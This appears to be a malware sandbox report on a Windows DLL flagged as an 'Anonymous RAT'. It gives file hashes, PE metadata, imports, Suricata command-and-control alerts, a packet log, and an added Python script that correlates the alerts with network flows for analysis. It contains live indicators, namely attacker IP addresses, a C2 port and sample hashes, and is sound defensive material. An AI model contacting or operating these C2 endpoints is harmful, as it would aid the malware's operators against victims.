                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:HLMJbase.dll
                            File size:1'071'104 bytes
                            MD5:250eb1ef1645f13252ef13c14ba66d51
                            SHA1:4aa14d113af1d74fbd1adbc16c10126b69878d0b
                            SHA256:dacdac1e333a1f45700e3707e617ff49c457226604f1ffa160fc3faf9b6810b3
                            SHA512:e8afc0d6c8c089a8cb1802e21a115961941951ef40d6d553f41980a0c40f9a0644220ba9c55623711f8928e1d47723e9f3d896bcce3806d181d509318ac78f6b
                            SSDEEP:24576:X8vRHK4uhXIAnszgnvuscGteHwoXilrEAfTo:V4rewws0rfc
                            TLSH:BB35AE40EAD3C5BBDD4F2474642FF33FDB32560A8338D693EBE42DB5A86A361541A106
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u...u...u.......u..mt...u..mv...u..mq...u..mp...u.&.t...u...t.a.u...u...u.`mu...u.`mw...u.Rich..u........................
                            Icon Hash:7ae282899bbab082
                            Entrypoint:0x100a12e9
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x10000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x67642B1D [Thu Dec 19 14:18:05 2024 UTC]
                            TLS Callbacks:0x10088fa0
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:5a379389d798d294fb7ce19042f3dcf5
                            Instruction
                            push ebp
                            mov ebp, esp
                            cmp dword ptr [ebp+0Ch], 01h
                            jne 00007F9EAD87D937h
                            call 00007F9EAD87D997h
                            push dword ptr [ebp+10h]
                            push dword ptr [ebp+0Ch]
                            push dword ptr [ebp+08h]
                            call 00007F9EAD87D7E3h
                            add esp, 0Ch
                            pop ebp
                            retn 000Ch
                            push ebp
                            mov ebp, esp
                            sub esp, 14h
                            lea eax, dword ptr [ebp-0Ch]
                            xorps xmm0, xmm0
                            push eax
                            movlpd qword ptr [ebp-0Ch], xmm0
                            call dword ptr [100A60C0h]
                            mov eax, dword ptr [ebp-08h]
                            xor eax, dword ptr [ebp-0Ch]
                            mov dword ptr [ebp-04h], eax
                            call dword ptr [100A60CCh]
                            xor dword ptr [ebp-04h], eax
                            call dword ptr [100A611Ch]
                            xor dword ptr [ebp-04h], eax
                            lea eax, dword ptr [ebp-14h]
                            push eax
                            call dword ptr [100A6148h]
                            mov eax, dword ptr [ebp-10h]
                            lea ecx, dword ptr [ebp-04h]
                            xor eax, dword ptr [ebp-14h]
                            xor eax, dword ptr [ebp-04h]
                            xor eax, ecx
                            leave
                            ret
                            mov ecx, dword ptr [10102040h]
                            push esi
                            push edi
                            mov edi, BB40E64Eh
                            mov esi, FFFF0000h
                            cmp ecx, edi
                            je 00007F9EAD87D936h
                            test esi, ecx
                            jne 00007F9EAD87D958h
                            call 00007F9EAD87D8C9h
                            mov ecx, eax
                            cmp ecx, edi
                            jne 00007F9EAD87D939h
                            mov ecx, BB40E64Fh
                            jmp 00007F9EAD87D940h
                            test esi, ecx
                            jne 00007F9EAD87D93Ch
                            or eax, 00004711h
                            shl eax, 10h
                            or ecx, eax
                            mov dword ptr [10102040h], ecx
                            not ecx
                            pop edi
                            mov dword ptr [10102080h], ecx
                            pop esi
                            ret
                            push ebp
                            mov ebp, esp
                            cmp dword ptr [ebp+0Ch], 01h
                            jne 00007F9EAD87D944h
                            cmp dword ptr [0000F88Ch], 00000000h
                            Programming Language:
                            • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x100a80 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x100ad4 | 0xdc | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x103000 | 0x4d0c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xff958 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xff9c0 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xff898 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa6000 | 0x20c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa4833 | 0xa4a00 | 9db27373bcf74384313548cdff739b89 | False | 0.5883815015186029 | data | 6.520667142363245 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xa6000 | 0x5b80e | 0x5ba00 | b940f5bdafb172ca49d82aa5efc8081c | False | 0.5340211459754434 | data | 6.20745028003892 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x102000 | 0x4d8 | 0x200 | 8917dd775708aa9b2d3e4f127fc8a4f9 | False | 0.119140625 | data | 0.6084715227586681 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x103000 | 0x4d0c | 0x4e00 | cc372a90e2aea2d045cbc1a9ae8ecd34 | False | 0.7442407852564102 | data | 6.595328231641845 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
bcryptprimitives.dll | ProcessPrng
api-ms-win-core-synch-l1-2-0.dll | WaitOnAddress, WakeByAddressSingle, WakeByAddressAll
kernel32.dll | SwitchToThread, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, InitializeSListHead, HeapReAlloc, HeapFree, Sleep, DisableThreadLibraryCalls, GetSystemTimeAsFileTime, GetModuleHandleW, WaitForSingleObject, GetCurrentThreadId, SetWaitableTimer, GetModuleHandleA, GetFinalPathNameByHandleW, SetLastError, GetQueuedCompletionStatusEx, SetHandleInformation, CreateIoCompletionPort, FreeLibrary, GetCurrentProcess, GetStdHandle, GetConsoleMode, GetProcAddress, MultiByteToWideChar, WriteConsoleW, QueryPerformanceFrequency, FormatMessageW, WaitForSingleObjectEx, LoadLibraryA, lstrlenW, GetCurrentProcessId, CreateMutexA, ReleaseMutex, GetEnvironmentVariableW, GetLastError, LoadLibraryExW, SetThreadErrorMode, CloseHandle, CreateThread, SetThreadStackGuarantee, GetCurrentThread, QueryPerformanceCounter, HeapAlloc, GetProcessHeap, GetCurrentDirectoryW, RtlCaptureContext, WideCharToMultiByte, PostQueuedCompletionStatus, UnhandledExceptionFilter, CreateWaitableTimerExW, SetFileCompletionNotificationModes, TerminateProcess
ws2_32.dll | WSACleanup, WSASend, bind, connect, setsockopt, WSAStartup, getaddrinfo, getsockopt, recv, send, getpeername, freeaddrinfo, closesocket, WSAIoctl, ioctlsocket, WSASocketW, getsockname, WSAGetLastError, shutdown
ntdll.dll | RtlNtStatusToDosError, NtDeviceIoControlFile, NtCreateFile, NtWriteFile, NtCancelIoFileEx
secur32.dll | EncryptMessage, FreeCredentialsHandle, DeleteSecurityContext, DecryptMessage, ApplyControlToken, FreeContextBuffer, QueryContextAttributesW, AcquireCredentialsHandleA, InitializeSecurityContextW, AcceptSecurityContext
advapi32.dll | RegOpenKeyExW, RegCloseKey, RegQueryValueExW
crypt32.dll | CertFreeCertificateChain, CertEnumCertificatesInStore, CertAddCertificateContextToStore, CertDuplicateStore, CertCloseStore, CertDuplicateCertificateChain, CertOpenStore, CertDuplicateCertificateContext, CertVerifyCertificateChainPolicy, CertGetCertificateChain, CertFreeCertificateContext
VCRUNTIME140.dll | _except_handler4_common, __CxxFrameHandler3, memcmp, memmove, memcpy, memset, __std_type_info_destroy_list
api-ms-win-crt-runtime-l1-1-0.dll | _seh_filter_dll, _initterm_e, _initialize_narrow_environment, _initialize_onexit_table, _initterm, _execute_onexit_table, _configure_narrow_argv, _cexit
Name | Ordinal | Address
NvOptimusEnablement | 1 | 0x100038c8
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-22T09:29:07.990203+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49736 | 45.204.213.99 | 7677 | TCP
2024-12-22T09:30:23.404849+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49739 | 45.204.213.99 | 7677 | TCP
2024-12-22T09:31:35.424214+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49740 | 45.204.213.99 | 7677 | TCP
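The three Suricata alerts above fire on three different client ports (49736, 49739, 49740) toward the same 45.204.213.99:7677 endpoint, while the TCP packet list that follows records each packet individually. The Python below is an added example, not part of the Joe Sandbox report: it folds per-packet rows into client-oriented conversations, joins each alert to the conversation it fired on, lists the remote endpoints by how many connections each received, and derives the check-in cadence from the alert timestamps. The alert rows are the report's three alerts; the packet rows are a short excerpt copied from the report's list in Timestamp | Source Port | Dest Port | Source IP | Dest IP order, so not every alert has packets in the excerpt and the code reports that case. The function names and the CET = UTC+1 assumption are ours.

```python
"""Added example (not part of the Joe Sandbox report): correlate the report's
Suricata alerts with its TCP packet list.

Sample data: ALERTS holds the three alerts from the report; PACKETS is a
constructed excerpt of the report's packet list, same values, in the column
order Timestamp | Source Port | Dest Port | Source IP | Dest IP.
Function names and the CET = UTC+1 assumption are ours.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

SANDBOX_HOST = "192.168.2.4"        # the analysis VM, as in the report
CET = timezone(timedelta(hours=1))   # assumption: report times are CET (UTC+1), no DST in December

# (timestamp, sid, signature, severity, src ip, src port, dst ip, dst port, proto)
ALERTS = [
    ("2024-12-22T09:29:07.990203+0100", 2052875, "ET MALWARE Anonymous RAT CnC Checkin", 1,
     "192.168.2.4", 49736, "45.204.213.99", 7677, "TCP"),
    ("2024-12-22T09:30:23.404849+0100", 2052875, "ET MALWARE Anonymous RAT CnC Checkin", 1,
     "192.168.2.4", 49739, "45.204.213.99", 7677, "TCP"),
    ("2024-12-22T09:31:35.424214+0100", 2052875, "ET MALWARE Anonymous RAT CnC Checkin", 1,
     "192.168.2.4", 49740, "45.204.213.99", 7677, "TCP"),
]

# Constructed excerpt of the report's packet list (values copied from the report).
PACKETS = """\
Dec 22, 2024 09:29:00.031868935 CET | 49730 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:00.031965971 CET | 443 | 49730 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:07.866497040 CET | 49736 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:07.935781002 CET | 49737 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:07.986484051 CET | 7677 | 49736 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:07.990202904 CET | 49736 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:10.257441044 CET | 49738 | 7677 | 192.168.2.4 | 45.204.213.99
"""


def parse_packet_ts(text):
    """'Dec 22, 2024 09:29:00.031868935 CET' -> aware datetime, rounded to
    microseconds (the report carries nanoseconds, which datetime cannot hold)."""
    stamp = text.rsplit(" ", 1)[0]                       # drop the trailing zone name
    head, _, frac = stamp.partition(".")
    base = datetime.strptime(head, "%b %d, %Y %H:%M:%S").replace(tzinfo=CET)
    micros = round(int(frac.ljust(9, "0")[:9]) / 1000)
    return base + timedelta(microseconds=micros)


def parse_packet_line(line):
    ts, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
    return {"ts": parse_packet_ts(ts), "sport": int(sport), "dport": int(dport),
            "sip": sip, "dip": dip}


def build_flows(table, host=SANDBOX_HOST):
    """Group packets into conversations keyed (client ip, client port, server ip,
    server port).  Server replies are folded into the client's key by swapping
    the endpoints."""
    flows = {}
    for line in table.strip().splitlines():
        p = parse_packet_line(line)
        if p["sip"] == host:                              # outbound from the sandbox
            key, direction = (p["sip"], p["sport"], p["dip"], p["dport"]), "out"
        else:                                             # inbound reply
            key, direction = (p["dip"], p["dport"], p["sip"], p["sport"]), "in"
        f = flows.setdefault(key, {"first": p["ts"], "last": p["ts"], "out": 0, "in": 0})
        f[direction] += 1
        f["first"], f["last"] = min(f["first"], p["ts"]), max(f["last"], p["ts"])
    return flows


def servers_by_port(flows):
    """Remote (ip, port) -> number of client connections to it.  A non-standard
    port hit by several short-lived connections stands out here."""
    counts = defaultdict(int)
    for _cip, _cport, sip, sport in flows:
        counts[(sip, sport)] += 1
    return dict(counts)


def match_alerts(flows, alerts):
    """Pair each alert with the conversation it fired on.  The flow is None when
    the packet data has no packets for that client port (an excerpt of the
    report's long list will not cover every alert)."""
    return [(a[1], a[2], (a[4], a[5], a[6], a[7]), flows.get((a[4], a[5], a[6], a[7])))
            for a in alerts]


def checkin_intervals(alerts):
    """Seconds between consecutive alerts: the RAT's check-in cadence."""
    times = sorted(datetime.strptime(a[0], "%Y-%m-%dT%H:%M:%S.%f%z") for a in alerts)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    for key, f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}  out={f['out']} in={f['in']}")
    print("servers:", servers_by_port(flows))
    for sid, sig, key, f in match_alerts(flows, ALERTS):
        print(sid, sig, key, "matched" if f else "no packets in excerpt")
    print("check-in intervals (s):", [round(x, 3) for x in checkin_intervals(ALERTS)])
```

Run against the excerpt, the first alert lands on the 49736 conversation (its timestamp sits within a microsecond of the last outbound packet in that conversation), the other two have no packets in the excerpt, and the alert spacing comes out at roughly 75 s and 72 s.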
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2024 09:29:00.031868935 CET | 49730 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:00.031965971 CET | 443 | 49730 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:00.031992912 CET | 49731 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:00.032035112 CET | 443 | 49731 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:00.032040119 CET | 49730 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:00.032083988 CET | 49731 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:00.045645952 CET | 49730 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:00.045687914 CET | 49731 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:00.045691013 CET | 443 | 49730 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:00.045708895 CET | 443 | 49731 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:01.880784035 CET | 443 | 49730 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:01.880918026 CET | 49730 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:01.885495901 CET | 443 | 49731 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:01.885581970 CET | 49731 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:01.909106970 CET | 49730 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:01.909153938 CET | 443 | 49730 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:01.909549952 CET | 443 | 49730 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:01.910880089 CET | 49731 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:01.910906076 CET | 443 | 49731 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:01.911721945 CET | 443 | 49731 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:01.963486910 CET | 49730 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:01.965003014 CET | 49731 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.117253065 CET | 49730 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.159359932 CET | 443 | 49730 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.228447914 CET | 49731 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.275338888 CET | 443 | 49731 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.645195007 CET | 443 | 49730 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.645560980 CET | 443 | 49730 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.645636082 CET | 49730 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.646421909 CET | 49730 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.646469116 CET | 443 | 49730 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.664660931 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.664695024 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.664758921 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.665117979 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.665131092 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.761069059 CET | 443 | 49731 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.761244059 CET | 443 | 49731 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.761300087 CET | 49731 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.761683941 CET | 49731 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.761703968 CET | 443 | 49731 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.774610996 CET | 49733 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.774647951 CET | 443 | 49733 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.774701118 CET | 49733 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.780478001 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.780512094 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.780580044 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.781450033 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.781476021 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:02.782063007 CET | 49733 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:02.782078981 CET | 443 | 49733 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.313266039 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.313352108 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:04.315431118 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:04.315445900 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.315773010 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.316246033 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:04.359370947 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.419727087 CET | 443 | 49733 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.419847012 CET | 49733 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:04.421238899 CET | 49733 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:04.421251059 CET | 443 | 49733 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.421916008 CET | 443 | 49733 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.427730083 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.427822113 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:04.449307919 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:04.449335098 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.450237036 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.450890064 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:04.463463068 CET | 49733 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:04.464875937 CET | 49733 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:04.491350889 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:04.511338949 CET | 443 | 49733 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.152226925 CET | 443 | 49733 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.152374983 CET | 443 | 49733 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.152437925 CET | 49733 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.152767897 CET | 49733 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.152782917 CET | 443 | 49733 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.173650980 CET | 49735 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.173676968 CET | 443 | 49735 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.173743010 CET | 49735 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.182595968 CET | 49735 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.182610035 CET | 443 | 49735 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.190304995 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.190332890 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.190360069 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.190402985 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.190437078 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.190468073 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.190489054 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.221323967 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.221384048 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.221426964 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.221461058 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.221482038 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.221517086 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.221544981 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.325329065 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.325351954 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.325412989 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.325450897 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.325483084 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.325505972 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.413317919 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.413342953 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.413381100 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.413398027 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.413439035 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.413460016 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.429483891 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.429511070 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.429553986 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.429558039 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.429600954 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.429617882 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.429627895 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.429678917 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.485991955 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.486012936 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.486053944 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.486068010 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.486094952 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.486116886 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.517405987 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.517462969 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.517481089 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.517496109 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.517535925 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.517554998 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.559057951 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.559084892 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.559127092 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.559140921 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.559186935 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.559186935 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.589837074 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.589889050 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.589934111 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.589950085 CET | 443 | 49734 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.589988947 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.589988947 CET | 49734 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.610101938 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.610131025 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.610198975 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.610212088 CET | 443 | 49732 | 38.147.186.138 | 192.168.2.4
Dec 22, 2024 09:29:05.610239029 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
Dec 22, 2024 09:29:05.610259056 CET | 49732 | 443 | 192.168.2.4 | 38.147.186.138
